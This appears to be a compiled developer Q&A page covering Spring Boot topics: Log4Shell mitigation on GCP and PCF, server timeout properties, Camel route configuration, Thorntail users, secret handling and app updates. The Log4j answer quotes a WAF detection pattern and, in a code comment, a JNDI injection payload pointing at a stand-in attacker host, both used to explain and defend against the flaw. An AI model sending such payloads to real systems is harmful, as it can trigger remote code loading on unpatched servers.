Log4j Vulnerability (CVE-2021-44228) on Google Cloud Platform and PCF - spring-boot

Many steps have been suggested for excluding the log4j-core library from dependencies or upgrading to the latest version (above 2.15), per the Spring Blog. Are there any recommended tools that can protect a Spring application deployed in Google App Engine or Pivotal Cloud Foundry (PCF), instead of patching it and redeploying?
Another necessary question: does my application (a Spring microservice) become vulnerable if it depends on another microservice for some of its functionality, and that microservice already uses a vulnerable version of log4j-core?

In regard to your first question, you can set an environment variable to disable the message lookups in log4j:
LOG4J_FORMAT_MSG_NO_LOOKUPS=true
Please note that this only works for log4j >= 2.10.
I believe you can set environment variables in PCF without having to redeploy the service (of course, a restart would be needed), so no new release would be needed. See: https://docs.pivotal.io/pivotalcf/2-3/devguide/deploy-apps/environment-variable.html and https://cli.cloudfoundry.org/en-US/v6/set-env.html
In order to see whether your spring-boot application is vulnerable to the exploit, you could use a spring-boot test I created for that purpose: https://github.com/chilit-nl/log4shell-example - You could test your application with and without the environment variable, to see if it has any effect (assuming that your application currently is vulnerable).

The short answer to your first question is maybe. You can protect your application/service by using WAF rules to discard the ${jndi:ldap:// pattern. However, there are so many mutations of this (base64 encoding etc.) that it will not be foolproof. If you are worried about dependencies, you should set the JVM parameter (-Dlog4j2.formatMsgNoLookups=true) and redeploy your app to prevent the lookup as a workaround.
Regarding your second question: the answer is yes, if the second microservice is passed the same input and logs it.
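To make the mechanism concrete: a service is exposed as soon as it logs attacker-controlled input with a vulnerable log4j-core, which is also why a downstream microservice that logs the same input is at risk. A minimal, hypothetical sketch (class and method names are made up):

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginController {

    private static final Logger LOG = LogManager.getLogger(LoginController.class);

    public void login(String username) {
        // If "username" is attacker-controlled, e.g. "${jndi:ldap://attacker.example/a}",
        // a vulnerable log4j-core resolves the JNDI lookup while formatting this message
        // and may load remote code. Any service in the call chain that logs the same
        // value is exposed in the same way.
        LOG.info("Login attempt for user {}", username);
    }
}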

Related

deprecated property: connection-timeout: 12000

I have this property in a Spring Boot application:
server:
  connection-timeout: 12000
I get a warning:
Deprecated: Each server behaves differently. Use server specific properties instead.
Gradle: org.springframework.boot:spring-boot-autoconfigure:2.6.8 (spring-boot-autoconfigure-2.6.8.jar)
Is there some better configuration property that I can use?
I'm not even sure why you receive a deprecation warning.
According to the documentation, from Spring Boot version 2.3 onwards this property is removed, not merely deprecated.
As you can read here, there are other properties you can use instead, depending on the server that runs your Spring Boot application.
server.tomcat.connection-timeout should be used if Tomcat is the running server.
server.netty.connection-timeout should be used if Netty is used.
server.jetty.connection-idle-timeout should be used if Jetty is used.
Basically, each server has its own implementation, so you must read your server's documentation to see what it allows and how it behaves. There might be slight differences between how one server interprets connection-timeout and how another server interprets a similar configuration.
I think this is why Spring decided to move to server-specific properties instead of the general connection-timeout property; another important reason is that some servers may not even have this configuration available, in which case you would have a general property configured in your Spring Boot application that the server running it cannot respect.
So you now have specific properties for specific servers: you can be sure up front whether the configuration is available in your server, and you can read the server documentation to understand exactly what the behavior will be.
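If you run on the embedded Tomcat and prefer Java config over setting server.tomcat.connection-timeout in application.yml, a customizer along these lines should have the same effect (an untested sketch; class and bean names are arbitrary):

import org.springframework.boot.web.embedded.tomcat.TomcatServletWebServerFactory;
import org.springframework.boot.web.server.WebServerFactoryCustomizer;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;

@Configuration
public class TomcatTimeoutConfig {

    // Programmatic equivalent of server.tomcat.connection-timeout: 12000 (Tomcat only).
    @Bean
    public WebServerFactoryCustomizer<TomcatServletWebServerFactory> connectionTimeoutCustomizer() {
        return factory -> factory.addConnectorCustomizers(connector ->
                connector.setProperty("connectionTimeout", "12000"));
    }
}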
Although this setting has been deprecated, you can still apply a timeout.
According to the official documentation, you can use @Transactional(timeout = 1) to enforce a timeout in the controller:
https://www.baeldung.com/spring-rest-timeout
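For reference, a minimal sketch of such a timeout (the service and method names are made up). Note that @Transactional(timeout = ...) limits how long a database transaction may run; it is not the HTTP connection timeout that the removed property controlled:

import org.springframework.stereotype.Service;
import org.springframework.transaction.annotation.Transactional;

@Service
public class ReportService {

    // Rolls the transaction back if it runs for longer than 1 second.
    @Transactional(timeout = 1)
    public void generateReport() {
        // ... repository calls / database work ...
    }
}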

Dynamic Camel route configuration at deployment time: Java DSL or XML DSL?

Let me preface this with the fact that I am still very new to Apache Camel. I'm still trying to understand how it all works, and what needs to be done (and HOW to do it) to achieve a particular effect.
I am trying to develop a Spring Boot application that will use Apache Camel to handle the transmission (and possibly also receipt) of data to/from a number of possible sources and destinations. The purpose of the application is to provide a means to produce/generate network traffic, at the network application level, that will be fed into another Spring Boot application - let's call this the target. We are trying to observe and measure the effects various network loads have on the target.
We would like to be able to transmit data via a number of protocols, including: ftp, http/s, file systems (nfs), various mail protocols (smtp, pop) and data streaming protocols for voice and video. There may be other protocols added at a later time. The data itself is irrelevant, we just need to be able to transmit data via various protocols with various loads.
These applications/services will be running in a containerized environment (Docker) that will be run within our local development and test environment, as well as possibly in a cloud environment, such as AWS. We have used Docker, Ansible, Terraform and are currently working towards using Kubernetes and Istio to manage the configuration, deployment, and operation of these applications.
We need to be able to provide specific configurations of Camel routes for particular deployments.
It would appear that the preferred method to configure Camel routes is via the Java DSL, rather than the XML DSL. The Camel documentation and nearly every other source of information I've found have a strong bias towards using the Java DSL. Examples of XML DSL route configuration are few and far between.
My initial impression is that going the Java DSL route (excuse the pun), would not work well with our need to be able to deploy a Camel application with a specific route configuration. It seems like you are required to have Java DSL defined route configurations hardwired into the code.
We think that it will be easier to provide a specific route configuration via an XML file that can be included in a deployment, hence why I've been trying to investigate and experiment with XML DSL. Perhaps we are mistaken in this regard.
My question to the community is: Considering what I've described above, can the Java DSL approach be used to meet the requirements as I've described them? Can we use Java DSL in a way that allows for dynamic route configuration? Keep in mind we would not be attempting to change configuration during operation, just in the course of performing a deployment.
If Java DSL could be used for this purpose, it would be very much appreciated if pointers to documentation, examples, etc. could be provided.
For your use case you could use the XML DSL as well. In any case, the book below covers most aspects of Camel development with examples; the authors show the XML DSL equivalent for most of the Java DSL examples.
https://www.manning.com/books/camel-in-action-second-edition
The GitHub repository below contains the source code for all the examples listed in the book.
https://github.com/camelinaction/camelinaction2
A simple tutorial and GitHub repository for Apache Camel with Spring Boot:
https://www.baeldung.com/apache-camel-spring-boot
https://github.com/eugenp/tutorials/tree/master/spring-boot-modules/spring-boot-camel
A Maven plugin for building and deploying a Spring Boot container application into a Kubernetes cluster:
https://maven.fabric8.io/
If your company can afford some funding for this effort, the link below lists commercial offerings around Camel.
https://camel.apache.org/manual/latest/commercial-camel-offerings.html
Thanks
Madhu Gupta
Our team has a few projects which use the Java DSL for building routes. In order to make them dynamic, there are control structures for iterating over and setting endpoints based on configuration. That works for us because the routes are basically all the same, just with different sources and sinks.
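As a rough illustration of that approach (a sketch only; the property names load.sources and load.sink are invented and the endpoint URIs are placeholders), a RouteBuilder can loop over externally supplied endpoints so the same code produces different routes per deployment:

import org.apache.camel.builder.RouteBuilder;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.stereotype.Component;

@Component
public class ConfigurableLoadRoutes extends RouteBuilder {

    // Comma-separated endpoint URIs, e.g. "ftp://host/outbox,file:/data/out"
    @Value("${load.sources}")
    private String[] sources;

    // Target endpoint, e.g. "http://target:8080/ingest"
    @Value("${load.sink}")
    private String sink;

    @Override
    public void configure() {
        // One route per configured source; the values can come from application.yml,
        // environment variables, or a mounted ConfigMap.
        for (String source : sources) {
            from(source)
                .routeId("load-" + source)
                .to(sink);
        }
    }
}

Because the endpoint URIs come from the environment, each deployment (Docker, Kubernetes, etc.) can supply its own set without any code changes.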
If you could dynamically add/change the XML DSL files in a way that doesn't involve redeploying your application, that might be a viable route to follow. One might, for example, change the camel.springboot.xml-routes property to point to a folder which changes as needed.

What is the simplest way to add application users in a Thorntail WildFly server?

As said in the title, is there a way to add application users in a Thorntail WildFly server, much like you would do with the "add-user.sh -a" script in the full server distribution?
I understand you can provide an external configuration file to Thorntail but that seems a bit of overhead just for specifying where users are located.
Thanks
The answer by Thomas Herzog is very good from a conceptual point of view -- I'd especially agree with securing the application using an external Keycloak, potentially with the help of MicroProfile JWT. I'm just gonna provide a few points in case you decide not to.
You can define users directly in project-defaults.yml, like this:
thorntail:
  management:
    security-realms:
      ApplicationRealm:
        in-memory-authentication:
          users:
            bob:
              password: tacos!
        in-memory-authorization:
          users:
            bob:
              roles:
                - admin
The project-defaults.yml file doesn't have to be external to the app, you can build it directly into it. Typically, in your source code, the file will be located in src/main/resources, and after building, it will be embedded inside the -thorntail.jar. It can be external, of course, and if this is something else than a throwaway prototype or test, sensitive data like this should be external.
You can also use the .properties files from WildFly:
thorntail:
  management:
    security-realms:
      ApplicationRealm:
        properties-authentication:
          path: .../path/to/application-users.properties
        properties-authorization:
          path: .../path/to/application-roles.properties
It depends on what you need the users for. Thorntail creates standalone microservices, which are different from applications hosted in a WildFly server.
Is there a management console in Thorntail?
Yes there is, but I have never used it.
https://docs.thorntail.io/2.2.0.Final/#_management
https://docs.thorntail.io/2.2.0.Final/#_management_console
Any users you might be able to create there shouldn't be persistent, because there is no WildFly server installation as you are used to with a standalone WildFly distribution; everything is packaged in the jar. A microservice shouldn't need to be configured after its deployment anymore, at least not like this.
How to secure my application?
I would recommend using external user management via Keycloak, which is integrated into Thorntail via the Keycloak fraction. With the Keycloak fraction you can define security constraints for your endpoints, similar to a web.xml.
https://docs.thorntail.io/2.2.0.Final/#_keycloak
Another way is to use the security fraction, which provides JAAS support for your microservice.
https://docs.thorntail.io/2.2.0.Final/#_security
The configuration is done via the thorntail specific project-defaults.yml configuration file, where you can configure the fractions via YAML.
What is a thorntail fraction?
A Thorntail fraction is similar to a Spring Boot starter dependency: the fraction provides the API for development and bundles the implementation and its integration into Thorntail. The fraction is actually a JBoss module which is packaged into the standalone microservice during the repackaging phase.
Where can I find examples?
See the following links for examples of how to use security in Thorntail. You should take a look at them.
https://github.com/thorntail/thorntail-examples/tree/master/security
Take a look at the src/main/resources/project-defaults.yml, which contains the configuration for the Thorntail fractions, and the pom.xml, which defines the used fractions.

Spring Boot best practices for hiding or encrypting passwords

I have been using the Spring Framework for about 4 years now, and now Spring Boot for the last couple of months. My Spring MVC applications are usually deployed on a Java EE container such as JBoss/WildFly or WebLogic. Doing so allows me to use JNDI for things like datasources or any other sensitive data that involve secrets/passwords. That makes my app "consume" that JNDI resource based on its name.
Now, with Spring Boot and especially with self-contained microservices (embedded Tomcat), that information is stored within the application (application.properties and/or Spring Java Config classes) and therefore versioned in Git.
That makes that information a lot more exposed to other developers, which I'm not very comfortable with. I also don't like having those details show up in SonarQube and Jenkins (through workspaces).
Question is: Are there any best practices for this specific requirement?
* UPDATE *
I see some articles here and there about the use of Jasypt, but I wonder if it's still a valid library to use, since the last stable release dates from 2014.
Thank you
You could consider using a vault. Spring supports a few of them out of the box. You can find more information here http://projects.spring.io/spring-vault/.
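A minimal sketch of reading a secret with Spring Vault (the endpoint, token, secret path and key names here are placeholders):

import org.springframework.vault.authentication.TokenAuthentication;
import org.springframework.vault.client.VaultEndpoint;
import org.springframework.vault.core.VaultTemplate;
import org.springframework.vault.support.VaultResponse;

public class VaultExample {

    public static void main(String[] args) {
        // Connect with a token; in a real setup the token itself would come from the
        // environment or an auth method such as AppRole or Kubernetes.
        VaultTemplate vault = new VaultTemplate(
                VaultEndpoint.create("vault.example.com", 8200),
                new TokenAuthentication("my-token"));

        // Read a secret and pull a single key out of it (the response may be null
        // if the path does not exist).
        VaultResponse response = vault.read("secret/my-app");
        String dbPassword = (String) response.getData().get("db.password");
        System.out.println("Password length: " + dbPassword.length());
    }
}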
If you have Spring Cloud in your stack, then it's very easy: encrypt the value and put it in the application properties. Follow the instructions mentioned here.
Another way is to set the values as environment variables and reference those environment variables in the application properties. Instructions here.
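A small sketch of the environment-variable approach (DB_PASSWORD is a made-up variable name; the url/username properties are the standard Spring ones). The secret never appears in application.properties or Git; it is injected by the container or CI/CD environment at deployment time:

import javax.sql.DataSource;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.boot.jdbc.DataSourceBuilder;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;

@Configuration
public class DataSourceConfig {

    @Bean
    public DataSource dataSource(@Value("${spring.datasource.url}") String url,
                                 @Value("${spring.datasource.username}") String username,
                                 @Value("${DB_PASSWORD}") String password) {
        // DB_PASSWORD is resolved from the OS environment at startup, so the
        // secret is never checked into version control.
        return DataSourceBuilder.create()
                .url(url)
                .username(username)
                .password(password)
                .build();
    }
}

The same effect can be achieved without Java config by writing spring.datasource.password=${DB_PASSWORD} in application.properties.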

Update for JavaEE application

Our application is built on Spring Boot; the app is packaged as a war file and run with java -jar xx.war -Dspring.profile=xxx. Generally the latest war package is served by a static web server like nginx.
Now we want to know if we can add auto-update for the application.
I have googled, and people suggest using an application server which supports hot deployment; however, we use Spring Boot as described above.
I have thought about starting a new thread once my application has started, to check for updates and download the latest package. But I would have to terminate the current application to start the new one, since they use the same port, and if I close the current app, the update thread is terminated too.
So how do you handle this problem?
In my opinion that should be managed by some higher-order, dev-ops-level orchestration system, not by the app or its container. The decision to replace an app should be made at the dev-ops level, not the app level.
One major advantage of Spring Boot is the inversion of the traditional web-container-hosts-application model. The web container is usually (and as best practice with Spring Boot) built within the app itself. Hence it is fully self-contained and, crucially, immutable. It therefore should not be the role of the app or its embedded container to replace either part of or all of itself.
Of course you can do whatever you like, but you might find that the solution is not easy, because it is not the convention to do it this way.
